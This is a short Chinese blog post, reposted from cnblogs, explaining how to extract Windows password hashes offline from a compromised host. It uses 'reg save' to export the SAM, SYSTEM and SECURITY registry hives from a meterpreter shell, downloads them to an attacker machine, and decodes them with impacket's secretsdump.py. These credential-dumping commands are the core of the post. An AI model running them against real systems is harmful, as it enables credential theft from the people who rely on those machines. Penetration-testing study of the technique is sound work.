离线提取目标机hash

0x01 前言

很多环境下,不允许上传或者使用mimikatz。而针对非域控的单机离线提取hash显得尤为重要。

meterpreter shell命令切到交互式cmd命令。

 

0x02 过程

 

 

reg save 方式使得需要下载的目标机

Ps:reg save将指定子项、项的注册表值的副本保存到指定文件中

我们需要导出的hash文件

 

reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv

meterpreter中使用shell命令来到交互式cmd

 

这样在c盘下就导出了三个注册表文件

 

返回meterpreter,使用meterpreter下自带download功能来将目标机的三个注册表文件下载到攻击机

 

 

 

下载好了后我们需要读取目标的hash

用到的工具是impacketsecretsdump.pyKali默认路径:

 

/root/impacket/examples/secretsdump.py

 

 

Ps:Impacket是一个Python类库,用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等协议进行低级编程访问。 

 

 

命令如下:

python /root/impacket/examples/secretsdump.py ‐sam sam.hiv ‐security security.hiv ‐system sys.hiv LOCAL

 

转载于:https://www.cnblogs.com/-qing-/p/10742450.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值